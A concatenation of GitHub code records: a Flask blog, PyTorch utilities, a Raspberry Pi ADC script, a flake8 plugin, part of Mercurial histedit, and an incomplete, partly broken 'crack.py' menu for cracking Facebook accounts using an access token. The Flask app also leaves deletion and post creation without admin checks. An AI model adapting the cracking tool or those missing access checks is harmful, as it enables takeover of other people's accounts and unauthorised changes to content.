app.app_context():\n # db.create_all()\n @app.route('/')\n def get_all_posts():\n posts = BlogPost.query.all()\n return render_template(\"index.html\", all_posts=posts, user=current_user)\n\n\n # REGISTER ROUTE\n @app.route('/register', methods=[\"GET\", \"POST\"])\n def register():\n form = RegisterForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(email=request.form.get('email')).first()\n if user:\n flash(message='You\\'ve already signed up with that email. Login instead', category='error')\n return redirect(url_for('login'))\n else:\n new_user = Users(\n email=form.email.data,\n password=generate_password_hash(password=form.password.data),\n name=form.name.data\n )\n db.session.add(new_user)\n db.session.commit()\n login_user(new_user)\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"register.html\", form=form, user=current_user)\n\n\n # LOGIN ROUTE\n @app.route('/login', methods=[\"GET\", \"POST\"])\n def login():\n form = LoginForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(email=request.form.get('email')).first()\n if user:\n if check_password_hash(pwhash=user.password, password=request.form.get('password')):\n login_user(user)\n return redirect(url_for('get_all_posts', user=current_user))\n else:\n flash(message='Password is incorrect', category='error')\n else:\n flash(message='Email does\\'nt exist. You can signup for a new account', category='error')\n return render_template(\"login.html\", form=form, user=current_user)\n\n\n # LOGOUT ROUTE\n @app.route('/logout')\n @login_required\n def logout():\n logout_user()\n return redirect(url_for('get_all_posts'))\n\n\n @app.route(\"/post/\", methods=[\"GET\", \"POST\"])\n # @login_required\n def show_post(post_id):\n comment_form = CommentForm()\n requested_post = session.get(BlogPost, post_id)\n if comment_form.validate_on_submit():\n if not current_user.is_authenticated:\n flash('Please login or register to comment')\n return redirect(url_for('login'))\n else:\n new_comment = Comment(\n text=comment_form.comment.data,\n user=current_user,\n blog_posts=requested_post\n )\n db.session.add(new_comment)\n db.session.commit()\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"post.html\", post=requested_post, user=current_user, form=comment_form)\n\n\n @app.route(\"/about\")\n def about():\n return render_template(\"about.html\", user=current_user)\n\n\n @app.route(\"/contact\")\n def contact():\n return render_template(\"contact.html\", user=current_user)\n\n\n @app.route(\"/new-post\", methods=[\"GET\", \"POST\"])\n @login_required\n # @admin_only\n def add_new_post():\n form = CreatePostForm()\n if form.validate_on_submit():\n new_post = BlogPost(\n title=form.title.data,\n subtitle=form.subtitle.data,\n body=form.body.data,\n img_url=form.img_url.data,\n author=current_user.name,\n date=date.today().strftime(\"%B %d, %Y\")\n )\n db.session.add(new_post)\n db.session.commit()\n return redirect(url_for(\"get_all_posts\"))\n return render_template(\"make-post.html\", form=form, user=current_user)\n\n\n # EDIT POSTS\n @app.route(\"/edit-post/\", methods=[\"GET\", \"POST\"])\n @login_required\n @admin_only\n def edit_post(post_id):\n post = BlogPost.query.get(post_id)\n edit_form = CreatePostForm(\n title=post.title,\n subtitle=post.subtitle,\n img_url=post.img_url,\n author=post.author,\n body=post.body\n )\n if edit_form.validate_on_submit():\n post.title = edit_form.title.data\n post.subtitle = edit_form.subtitle.data\n post.img_url = edit_form.img_url.data\n # post.author = edit_form.author.data\n post.body = edit_form.body.data\n db.session.commit()\n return redirect(url_for(\"show_post\", post_id=post.id))\n\n return render_template(\"make-post.html\", form=edit_form, user=current_user)\n\n\n # DELETE POSTS\n @app.route(\"/delete/\")\n @login_required\n def delete_post(post_id):\n post_to_delete = BlogPost.query.get(post_id)\n db.session.delete(post_to_delete)\n db.session.commit()\n return redirect(url_for('get_all_posts'))\n\n\n if __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Godwin987/My-Blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20978902876","text":"from __future__ import print_function, absolute_import\n\n__all__ = ['accuracy']\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res","repo_name":"LiyuanLucasLiu/RAdam","sub_path":"cifar_imagenet/utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":2503,"dataset":"github-code","pt":"66"} +{"seq_id":"5140564710","text":"import os\n\nimport torch\nfrom PIL import Image\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\n\n\nclass My_dataset(Dataset):\n def __init__(self,path_image,path_lable_1,path_lable_2,path_lable_3,path_lable_4):\n self.path_image=path_image\n self.path_lable_1=path_lable_1\n self.path_lable_2 = path_lable_2\n self.path_lable_3 = path_lable_3\n self.path_lable_4 = path_lable_4\n self.images=os.listdir(self.path_image)\n\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, index):\n\n image_index=self.images[index]\n image_path=os.path.join(self.path_image,image_index) #得到图像路径\n img=Image.open(image_path).convert('1') #读取图像\n #1,2,3,4分别代表上右下左\n #1\n label_path=os.path.join(self.path_lable_1,image_index[:-4]+self.path_lable_1[-2:]+'.jpg')\n label_1=Image.open(label_path).convert('1')\n # 2\n label_path = os.path.join(self.path_lable_2, image_index[:-4] + self.path_lable_2[-2:] + '.jpg')\n label_2 = Image.open(label_path).convert('1')\n # 3\n label_path = os.path.join(self.path_lable_3, image_index[:-4] + self.path_lable_3[-2:] + '.jpg')\n label_3 = Image.open(label_path).convert('1')\n # 4\n label_path = os.path.join(self.path_lable_4, image_index[:-4] + self.path_lable_4[-2:] + '.jpg')\n label_4 = Image.open(label_path).convert('1')\n\n #把图像转成tensor格式\n to_tensor = transforms.ToTensor() # 必须进行实例化\n img = to_tensor(img)\n img = img.view(128, 128)\n\n label_1=to_tensor(label_1)\n label_1=label_1.view(32,128)\n\n label_2 = to_tensor(label_2)\n label_2 = label_2.view(128, 32)\n\n label_3 = to_tensor(label_3)\n label_3 = label_3.view(32, 128)\n\n label_4= to_tensor(label_4)\n label_4 = label_4.view(128, 32)\n\n #生成上方的,从下往上生成\n img_1=torch.flip(img,[0])\n label_1=torch.flip(label_1,[0])\n\n # 生成右方的,从左往右生成\n\n img_2 = torch.t(img)\n label_2 = torch.t(label_2)\n\n # 生成下方的,从上往下生成\n img_3 =img\n label_3 = label_3\n\n # 生成右方的,从右往左生成\n img_4 = torch.t(img)\n label_4 = torch.t(label_4)\n img_4 = torch.flip(img_4, [0])\n label_4 = torch.flip(label_4, [0])\n\n return img_1,label_1,img_2,label_2,img_3,label_3,img_4,label_4\n\n\n\n","repo_name":"wuyulongstudy/my_self-supervised_transformer-","sub_path":"my_dataset.py","file_name":"my_dataset.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6554116815","text":"import RPi.GPIO as GPIO\nimport time\nfrom math import ceil\n\ndef dec2bin(x):\n return [int(bit) for bit in bin(x)[2:].zfill(8)]\n\ndef adc():\n x = 0\n\n for i in range(7, -1, -1):\n x += 2**i\n GPIO.output(dac, dec2bin(x))\n time.sleep(0.001)\n comp_value = GPIO.input(comp)\n if comp_value == 0:\n x -= 2**i\n\n return x\n\nGPIO.setmode(GPIO.BCM)\n\ndac = [26, 19, 13, 6, 5, 11, 9, 10]\nleds = [21, 20, 16, 12, 7, 8, 25, 24]\ncomp = 4\ntroyka = 17\n\nGPIO.setup(dac, GPIO.OUT)\nGPIO.setup(troyka, GPIO.OUT, initial = GPIO.LOW)\nGPIO.setup(comp, GPIO.IN)\nGPIO.setup(leds, GPIO.OUT)\n\ntry:\n while True:\n x = ceil(adc()/32)\n signal = [0, 0, 0, 0, 0, 0, 0, 0]\n for i in range(x):\n signal[7-i] = 1\n GPIO.output(leds, signal)\n\nexcept KeyboardInterrupt:\n print(\"The program has been stopped by pressing on a key\")\n\nfinally:\n GPIO.output(dac, 0)\n GPIO.output(troyka, 0)\n GPIO.cleanup()","repo_name":"IvanLikhodievskiy/get","sub_path":"5-3-adc-volume.py","file_name":"5-3-adc-volume.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40070042693","text":"import time\nfrom copy import copy\n\nfrom nonebot import get_bot\nfrom nonebot.log import logger\nimport platform\nimport httpx\nimport json\n\nbot = get_bot()\nconfig = bot.config\n\n\nclass Request:\n def __init__(self):\n self.headers = {\"User-Agent\": f\"NoneBot({list(config.SUPERUSERS)[0]}/{platform.python_version()})\"}\n\n async def connect(self, url: str, data: dict = None, headers: dict = None, timeout: int = 10) -> str:\n headers = headers if headers else self.headers\n try:\n async with httpx.AsyncClient() as client:\n result = await client.post(url=url, data=data, headers=headers, timeout=timeout)\n return await self.result(result.text)\n except Exception as e:\n logger.error(f\"连接网页 {url} 出问题惹!{e}\")\n\n async def content(self, url: str, params: dict = None, headers: dict = None, timeout: int = 10) -> str:\n headers = headers if headers else self.headers\n try:\n async with httpx.AsyncClient() as client:\n result = await client.get(url=url, params=params, headers=headers, timeout=timeout)\n return await self.result(result.text)\n except Exception as e:\n logger.error(f\"连接网页 {url} 出问题惹!{e}\")\n\n async def result(self, data: str) -> str:\n try:\n result = json.loads(data)\n except (json.decoder.JSONDecodeError, TypeError):\n return data\n return result\n","repo_name":"nicemoe/jx3bot","sub_path":"plugin/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"17883057125","text":"import re\nfrom io import BytesIO\n\nfrom flake8.formatting import base\n\nfrom teamcity.messages import TeamcityServiceMessages\nfrom teamcity import __version__, is_running_under_teamcity\n\n\nclass TeamcityReport(base.BaseFormatter):\n name = 'teamcity-messages'\n version = __version__\n\n @staticmethod\n def _add_option(parser, name, *args, **kwargs):\n if all(option.long_option_name != name for option in parser.options):\n parser.add_option(name, *args, **kwargs)\n\n @classmethod\n def add_options(cls, parser):\n cls._add_option(parser,\n '--teamcity',\n default=is_running_under_teamcity(),\n help=\"Force output of JetBrains TeamCity service messages\")\n cls._add_option(parser,\n '--no-teamcity',\n default=False,\n help=\"Disable output of JetBrains TeamCity service messages (even under TeamCity build)\")\n\n @classmethod\n def parse_options(cls, options):\n if not options.no_teamcity:\n if options.teamcity or is_running_under_teamcity():\n options.format = 'teamcity-messages'\n\n def format(self, error):\n normalized_filename = error.filename.replace(\"\\\\\", \"/\")\n position = '%s:%d:%d' % (\n normalized_filename, error.line_number, error.column_number)\n error_message = '%s %s' % (error.code, error.text)\n test_name = 'pep8: %s: %s' % (normalized_filename, error_message)\n\n line = error.physical_line\n offset = error.column_number\n details = [\n position,\n line.rstrip(),\n re.sub(r'\\S', ' ', line[:offset]) + '^',\n ]\n details = '\\n'.join(details)\n\n bytesio = BytesIO()\n messages = TeamcityServiceMessages(output=bytesio)\n\n messages.testStarted(test_name)\n messages.testFailed(test_name, error_message, details)\n messages.testFinished(test_name)\n\n return bytesio.getvalue().decode('UTF-8')\n","repo_name":"JetBrains/intellij-community","sub_path":"python/helpers/pycharm/teamcity/flake8_v3_plugin.py","file_name":"flake8_v3_plugin.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"43009741874","text":"'''\n author: Sungguk Cha\n email : navinad@naver.com\n\n evaluation script with label and prediction(image form)\n'''\n\nimport argparse\nimport numpy as np\nimport os\n\nfrom PIL import Image\nfrom torch.utils import data\nfrom tqdm import tqdm\nfrom utils.metrics import Evaluator\n\nclass Loader(data.Dataset):\n def __init__(self, args):\n self.args = args\n\n # labels\n self.label_dir = args.labels\n '''\n for img in os.listdir(args.labels):\n _dir = os.path.join(args.labels, img)\n if os.path.isfile(_dir):\n self.labels.append(_dir)\n '''\n\n # predictions\n self.preds = []\n for img in os.listdir(args.preds):\n _dir = os.path.join(args.preds, img)\n if os.path.isfile(_dir):\n self.preds.append(_dir)\n\n #assert len(self.labels) == len(self.preds)\n\n def __len__(self):\n return len(self.preds)\n\n def __getitem__(self, index):\n _pred = self.preds[index]\n _name = os.path.basename(_pred.split('.')[-2] + '.png')\n _label = os.path.join(self.label_dir, _name)\n assert os.path.basename(_pred.split('.')[-2]) == os.path.basename(_label.split('.')[-2])\n _label = Image.open(_label).convert('RGB')\n _pred = Image.open(_pred).convert('RGB')\n if _label.size != _pred.size:\n _pred = _pred.resize( _label.size, Image.BILINEAR )\n _label = np.asarray(_label)\n _pred = np.asarray(_pred)\n\n return {'pred':_pred, 'label':_label, 'name':_name}\n\nclass Eval(object):\n def __init__(self, args):\n self.args = args\n self.evaluator = Evaluator(args.nclass)\n self.loader = Loader(args)\n\n def evaluation(self):\n self.evaluator.reset()\n tbar = tqdm(self.loader)\n for i, sample in enumerate(tbar):\n names = sample['name']\n preds = sample['pred']\n labels = sample['label']\n self.evaluator.add_batch(labels, preds)\n \n miou = self.evaluator.Mean_Intersection_over_Union()\n fwiou = self.evaluator.Frequency_Weighted_Intersection_over_Union()\n print(\"mIoU:\", miou)\n print(\"fwIoU:\", fwiou)\n\ndef get_args():\n parser = argparse.ArgumentParser()\n # Dataset specific\n parser.add_argument('--nclass', type=int)\n # Dataloader specific\n parser.add_argument('--preds', type=str)\n parser.add_argument('--labels', type=str)\n parser.add_argument('--vis', type=bool, default=False, action='store_true')\n return parser.parse_args()\n\nif __name__ == '__main__':\n args = get_args()\n ev = Eval(args)\n ev.evaluation()\n","repo_name":"sunggukcha/deeplabs","sub_path":"evalbyimage.py","file_name":"evalbyimage.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"66"} +{"seq_id":"4986774720","text":"n = int(input())\r\n\r\nfor i in range(1,n+1):\r\n a = sum((map(int,str(i))))\r\n a_sum = i + a\r\n\r\n if a_sum == n:\r\n print(i)\r\n break\r\n if i == n:\r\n print(0)","repo_name":"hungeun/Algorithm_hg","sub_path":"hungeun/브루트 포스/브루트 포스/분해합.py","file_name":"분해합.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"429438593","text":"import requests,bs4,json,os,sys,random,datetime,time,re\n\nimport threading\n\nfrom rich.table import Table as me\n\nfrom rich.console import Console as sol\n\nfrom bs4 import BeautifulSoup as parser\n\nfrom concurrent.futures import ThreadPoolExecutor as tred\n\nfrom rich.console import Group as gp\n\nfrom rich.panel import Panel as nel\n\nfrom rich import print as cetak\n\nfrom rich.markdown import Markdown as mark\n\nfrom rich.columns import Columns as col\n\n\nid,id2,loop,ok,cp,akun,oprek,method,lisensiku,taplikasi,tokenku,uid,lisensikuni= [],[],0,0,0,[],[],[],[],[],[],[],[]\n\n\n\nx = '\\33[m' # DEFAULT\n\nk = '\\033[93m' # KUNING +\n\nh = '\\x1b[1;92m' # HIJAU +\n\nhh = '\\033[32m' # HIJAU -\n\nu = '\\033[95m' # UNGU\n\nkk = '\\033[33m' # KUNING -\n\nb = '\\33[1;96m' # BIRU -\n\np = '\\x1b[0;34m' # BIRU +\n\nP = '\\033[0;00m'\n\nJ = '\\033[0;33m'\n\nS = '\\033[0;00m'\n\nN = '\\x1b[0m'\n\nI ='\\033[0;32m'\n\nC ='\\033[0;36m'\n\nM ='\\033[0;31m'\n\nU ='\\033[0;35m'\n\nK ='\\033[0;33m'\n\nP='\\033[00m'\n\nh='\\033[0;90m'\n\nQ=\"\\033[00m\"\n\nkk='\\033[0;32m'\n\nff='\\033[0;36m'\n\nG='\\033[0;36m'\n\np='\\033[00m'\n\nh='\\033[0;90m'\n\nQ=\"\\033[00m\"\n\nI='\\033[0;32m'\n\nII='\\033[0;36m'\n\nm='\\033[0;31m'\n\nO ='\\033[0;33m'\n\nH='\\033[0;33m'\n\nb = '\\033[0;36m'\n\nwar = \"[•]\"\n\nB = random.choice([U,I,K,b,M])\n\n\n\ndic = {'1':'Januari','2':'Februari','3':'Maret','4':'April','5':'Mei','6':'Juni','7':'Juli','8':'Agustus','9':'September','10':'Oktober','11':'November','12':'Desember'}\n\ndic2 = {'01':'Januari','02':'Februari','03':'Maret','04':'April','05':'Mei','06':'Juni','07':'Juli','08':'Agustus','09':'September','10':'Oktober','11':'November','12':'Desember'}\n\ntgl = datetime.datetime.now().day\n\nbln = dic[(str(datetime.datetime.now().month))]\n\nthn = datetime.datetime.now().year\n\nokc = 'OK-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'\n\ncpc = 'CP-'+str(tgl)+'-'+str(bln)+'-'+str(thn)+'.txt'\n\ndef clear():\n\tos.system('clear')\ndef back():\n\tmenu()\ndef banner():\n\tprint('''%s\n\t_______ ______ _______ _ ______ \n ( ____ )|\\ /|( __ \\ ( ___ )( \\ |\\ /|( __ \\ \n | ( )|| ) ( || ( \\ )| ( ) || ( ( \\ / )| ( \\ )\n | (____)|| | | || | ) || (___) || | _____ \\ (_) / | | ) |\n | __)| | | || | | || ___ || |(_____) ) _ ( | | | |\n | (\\ ( | | | || | ) || ( ) || | / ( ) \\ | | ) |\n | ) \\ \\__| (___) || (__/ )| ) ( || (____/\\( / \\ )| (__/ )\n |/ \\__/(_______)(______/ |/ \\|(_______/|/ \\|(______/ \n \n───────────────────────────────────────────────────────\n [\\x1b[1;96m+%s] Author : Rudal-XD\n [\\x1b[1;96m+%s] Github : -\n [\\x1b[1;96m+%s] Facebook : Fanky\n───────────────────────────────────────────────────────\\n'''%(N,N,N,N))\n\n\nbalmond = O+\"[\"+J+\"•\"+O+\"]\"\n\n\ndef login():\n\t\tbanner()\n\t\tsky = '# MASUKAN TOKEN FACEBOOK'\n\t\tsky2 = mark(sky, style='green')\n\t\tsol().print(sky2, style='cyan')\n\t\tpanda = input(x+'['+p+'•'+x+'] Token Fb : ')\n\t\takun=open('.token.x','w').write(panda)\n\t\ttry:\n\t\t\ttes = requests.get('https://graph.facebook.com/me?access_token='+panda)\n\t\t\ttes3 = json.loads(tes.text)['id']\n\t\t\tsue = '# nice Login berhasil'\n\t\t\tsuu = mark(sue, style='green')\n\t\t\tsol().print(suu, style='cyan')\n\t\t\ttime.sleep(2)\n\t\t\tmenu()\n\t\texcept KeyError:\n\t\t\tsue = '# Login Gagal, Cek token'\n\t\t\tsuu = mark(sue, style='red')\n\t\t\tsol().print(suu, style='cyan')\n\t\t\ttime.sleep(2)\n\t\t\tlogin()\n\t\texcept requests.exception.ConnectionError:\n\t\t\tli = '# KONEKSI INTERNET \t\t\t\t\t\t\t\t\tBERMASALAH, PERIKSA & COBA LAGI'\n\t\t\tlo = mark(li, style='red')\n\t\t\tsol().print(lo, style='cyan')\n\t\t\tmenu()\n\t\t\nclass menu:\n\n\tdef __init__(self): #line1\n\t\tself.uid = []\n\tdef menu(self):\n\t\ttry:\n\t\t\ttoke = open('token.x','r').read()\n\t\texcept IOError:\n\t\t\tprint(' [%s+%s] Kamu belum login'%(M,N));login().__login__()\n\t\ttry:\n\t\t\tr = requests.get('https://graph.facebook.com/me?access_token=%s'%(toke)).json()['name']\n\t\texcept KeyError:\n\t\t\tprint(' [%s!%s] Login gagal ...'%(M,N));os.system('rm -rf token.x');time.sleep(2);login().__login__()\n\t\texcept requests.exceptions.ConnectionError:\n\t\t\texit(' [%s!%s] cek koneksi'%(M,N))\n\t\ttry:\n\t\t\takss = open('token.x','r').read()\n\t\texcept IOError:\n\t\t\takss = '-'\n\t\tbanner()\n\t\tIP = requests.get('https://api.ipify.org').text\n\t\tjalan(' %s[ %sselamat Datang %s%s ]'%(N,H,r,N))\n\t\tprint(' %s[%s•%s] Alamat IP kamu saat ini : %s'%(H,O,H,IP))\n\t\tprint(' %s[%s•%s] Kamu masuk pada : %s'%(N,O,N,waktu))\n\t\tprint(' %s'%(N))\n\t\tprint(' %s[%s0%s] crack dari daftar teman'%(N,O,N))\n\t\tprint(' %s[%s1%s] crack dari akun publik'%(N,O,N))\n\t\tprint(' %s[%s2%s] crack dari akun massal'%(N,O,N))\n\t\tprint(' %s[%s3%s] crack dari postingan'%(N,O,N))\n\t\tprint(' %s[%s4%s] crack dari likes post'%(N,O,N))\n\t\tprint(' %s[%s5%s] crack dari followers'%(N,O,N))\n\t\tprint(' %s[%s6%s] cek opsi akun chekpoint'%(N,O,N))\n\t\tprint(' %s[%s7%s] cek hasil crack ok,cp'%(N,O,N))\n\t\tprint(' %s[%s8%s] seting User-Agent'%(N,O,N))\n\t\tprint(' %s[%s9%s] crack email'%(N,O,N))\n\t\tprint(' %s[%sG%s] Get data² facebook'%(N,O,N))\n\t\tprint(' %s[%sK%s] Lapor bug script'%(N,O,N))\n\t\tprint(' %s[%sA%s] Keluar, hapus token'%(N,O,N))\n\t\tself.pilih()\n\tdef pilih(self):\n\n\t\tprint(' %s'%(N))\n\n\t\tusna = input(' %s[%s+%s] choose : '%(N,O,N))\n\n\t\tif usna in ['']:\n\n\t\t\tprint(' %s'%(N))\n\n\t\t\tprint(' %s[%s!%s] Jangan kosong mas'%(N,M,N));time.sleep(2);menu().main()\n\n\t\telif usna in ['0','00']:\n\n\t\t\ttry:\n\n\t\t\t\ttoken = open('token.x','r').read()\n\n\t\t\texcept IOError:\n\n\t\t\t\tos.system('rm -rf token.x')\n\n\t\t\t\texit(' %s[%s!%s] Cek token kamu'%(N,M,N))\n\n\t\t\ttry:\n\n\t\t\t\tlmt = input(' %s[%s+%s] Limit id : '%(N,O,N))\n\n\t\t\t\tr = requests.get('https://graph.facebook.com/me?fields=friends.limit(%s)&access_token=%s'%(lmt,token))\n\n\t\t\t\tz = json.loads(r.text)\n\n\t\t\t\tid = []\n\n\t\t\t\tfor w in z['friends']['data']:\n\n\t\t\t\t\tid.append(z['id'] + '<=>' + w['name'])\n\n\t\t\texcept KeyError:\n\n\t\t\t\tprint(' %s[%s!%s] Akun anda tidak publik...'%(N,M,N));time.sleep(2);menu().main()\n\n\t\t\telse:\n\n\t\t\t\tcrack().fbeh(id)\n\n\t\telif usna in ['1','01']:\n\n\t\t\ttry:\n\n\t\t\t\ttoken = open('token.x','r').read()\n\n\t\t\texcept IOError:\n\n\t\t\t\tos.system('rm -rf token.x')\n\n\t\t\t\texit(' %s[%s!%s] Coba jalankan ulang !'%(N,M,N))\n\n\t\t\ttry:\n\n\t\t\t\tprint(' %s'%(N))\n\n\t\t\t\tidt = input(' %s[%s•%s] Masukan id : '%(N,O,N))\n\n\t\t\t\tr = requests.get('https://graph.facebook.com/%s?fields=friends.limit(5001)&access_token=%s'%(idt,token))\n\n\t\t\t\te = json.loads(r.text)\n\n\t\t\t\tid = []\n\n\t\t\t\tfor u in e['friends']['data']:\n\n\t\t\t\t\tid.append(u['id'] + '<=>' + u['name'])\n\n\t\t\texcept KeyError:\n\n\t\t\t\tprint(' %s'%(N))\n\n\t\t\t\tjalan(' %s[%s•%s] ID %s tidak di temukan!'%(N,M,N,idt));time.sleep(2);menu().main()\n\n\t\t\telse:\n\n\t\t\t\tcrack().fbeh(id)\n\n\t\telif usna in ['2','02']:\n\n\t\t\t\texit()\n\nif __name__=='__main__':\n\tmenu()\n","repo_name":"Rudal-XD/crack-02","sub_path":"crack.py","file_name":"crack.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9865805330","text":"import os\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset\nimport torchvision as tv\nimport torchvision.transforms as transforms\nfrom PIL import Image\nimport numpy as np\n\nclass RealFakeDataset(Dataset):\n def __init__(self, path_real, path_fake, split=\"train\", transform=None):\n\n self.path_real = path_real\n self.path_fake = path_fake\n \n self.real_images = sorted(os.listdir(self.path_real))\n self.fake_images = sorted(os.listdir(self.path_fake))\n self.real_images = [os.path.join(self.path_real, img) for img in self.real_images]\n self.fake_images = [os.path.join(self.path_fake, img) for img in self.fake_images]\n\n self.transform = transform\n\n if split == \"train\":\n self.real_images = self.real_images[:int(0.8*len(self.real_images))]\n self.fake_images = self.fake_images[:int(0.8*len(self.fake_images))]\n elif split == \"val\":\n self.real_images = self.real_images[int(0.8*len(self.real_images)):]\n self.fake_images = self.fake_images[int(0.8*len(self.fake_images)):]\n\n assert len(self.real_images) == len(self.fake_images)\n\n # Define an offset in indices for the fake images.\n # The offset is reset every epoch to change the pairing\n # while making each image appear once per epoch.\n self.random_modulo = np.random.randint(0, len(self.real_images))\n\n self._cache = {}\n\n def __len__(self):\n return len(self.real_images)\n \n def __getitem__(self, idx):\n real = self._cache_image_loader(self.real_images[idx])\n fake = self._cache_image_loader(self.fake_images[idx % self.random_modulo]) \n\n if self.transform:\n real = self.transform(real)\n fake = self.transform(fake)\n\n return real, fake\n\n def _cache_image_loader(self, path):\n if not path in self._cache:\n self._cache[path] = Image.open(path)\n return self._cache[path]\n\ndef get_dataloaders(config):\n train_ds = RealFakeDataset(\n path_real=config.data.path_real,\n path_fake=config.data.path_fake,\n split=\"train\",\n transform=tv.transforms.ToTensor()\n )\n val_ds = RealFakeDataset(\n path_real=config.data.path_real,\n path_fake=config.data.path_fake,\n split=\"val\",\n transform=tv.transforms.ToTensor()\n )\n\n if config.data.num_workers == \"auto\":\n config.data.num_workers = min(config.data.batch_size, os.cpu_count()//torch.cuda.device_count())\n\n train_dl = torch.utils.data.DataLoader(\n train_ds,\n batch_size=config.data.batch_size,\n shuffle=True,\n num_workers=config.data.num_workers,\n pin_memory=True,\n )\n\n val_dl = torch.utils.data.DataLoader(\n val_ds,\n batch_size=config.data.batch_size,\n shuffle=False,\n num_workers=config.data.num_workers,\n pin_memory=True,\n )\n\n return train_dl, val_dl\n","repo_name":"HReynaud/CycleGan_lightning","sub_path":"cyclegan_lightning/utils/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"5562779042","text":"# -*- coding:utf-8 -*-\nfrom dependency_parse import DependencyParser\n\nsentences = DependencyParser.parse('neko.txt.cabocha')\nsentence = sentences[7]\nfor chunk in sentence:\n dst_surface = ''.join([morph.surface for morph in chunk.morphs if morph.pos != '記号'])\n\n src_surfaces = []\n for idx in chunk.srcs:\n src_chunk = sentence[idx]\n src_surface = ''.join([morph.surface for morph in src_chunk.morphs if morph.pos != '記号'])\n src_surfaces.append(src_surface)\n print('\\t'.join([dst_surface] + src_surfaces))","repo_name":"tarhashi/pynlp100","sub_path":"chapter5/42.py","file_name":"42.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18227393265","text":"from __future__ import absolute_import\n\n# chistedit dependencies that are not available everywhere\ntry:\n import fcntl\n import termios\nexcept ImportError:\n fcntl = None\n termios = None\n\nimport functools\nimport os\nimport struct\n\nfrom mercurial.i18n import _\nfrom mercurial.pycompat import (\n getattr,\n open,\n)\nfrom mercurial.node import (\n bin,\n hex,\n short,\n)\nfrom mercurial import (\n bundle2,\n cmdutil,\n context,\n copies,\n destutil,\n discovery,\n encoding,\n error,\n exchange,\n extensions,\n hg,\n logcmdutil,\n merge as mergemod,\n mergestate as mergestatemod,\n mergeutil,\n obsolete,\n pycompat,\n registrar,\n repair,\n rewriteutil,\n scmutil,\n state as statemod,\n util,\n)\nfrom mercurial.utils import (\n dateutil,\n stringutil,\n urlutil,\n)\n\npickle = util.pickle\ncmdtable = {}\ncommand = registrar.command(cmdtable)\n\nconfigtable = {}\nconfigitem = registrar.configitem(configtable)\nconfigitem(\n b'experimental',\n b'histedit.autoverb',\n default=False,\n)\nconfigitem(\n b'histedit',\n b'defaultrev',\n default=None,\n)\nconfigitem(\n b'histedit',\n b'dropmissing',\n default=False,\n)\nconfigitem(\n b'histedit',\n b'linelen',\n default=80,\n)\nconfigitem(\n b'histedit',\n b'singletransaction',\n default=False,\n)\nconfigitem(\n b'ui',\n b'interface.histedit',\n default=None,\n)\nconfigitem(b'histedit', b'summary-template', default=b'{rev} {desc|firstline}')\n\n# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for\n# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should\n# be specifying the version(s) of Mercurial they are tested with, or\n# leave the attribute unspecified.\ntestedwith = b'ships-with-hg-core'\n\nactiontable = {}\nprimaryactions = set()\nsecondaryactions = set()\ntertiaryactions = set()\ninternalactions = set()\n\n\ndef geteditcomment(ui, first, last):\n \"\"\"construct the editor comment\n The comment includes::\n - an intro\n - sorted primary commands\n - sorted short commands\n - sorted long commands\n - additional hints\n\n Commands are only included once.\n \"\"\"\n intro = _(\n b\"\"\"Edit history between %s and %s\n\nCommits are listed from least to most recent\n\nYou can reorder changesets by reordering the lines\n\nCommands:\n\"\"\"\n )\n actions = []\n\n def addverb(v):\n a = actiontable[v]\n lines = a.message.split(b\"\\n\")\n if len(a.verbs):\n v = b', '.join(sorted(a.verbs, key=lambda v: len(v)))\n actions.append(b\" %s = %s\" % (v, lines[0]))\n actions.extend([b' %s'] * (len(lines) - 1))\n\n for v in (\n sorted(primaryactions)\n + sorted(secondaryactions)\n + sorted(tertiaryactions)\n ):\n addverb(v)\n actions.append(b'')\n\n hints = []\n if ui.configbool(b'histedit', b'dropmissing'):\n hints.append(\n b\"Deleting a changeset from the list \"\n b\"will DISCARD it from the edited history!\"\n )\n\n lines = (intro % (first, last)).split(b'\\n') + actions + hints\n\n return b''.join([b'# %s\\n' % l if l else b'#\\n' 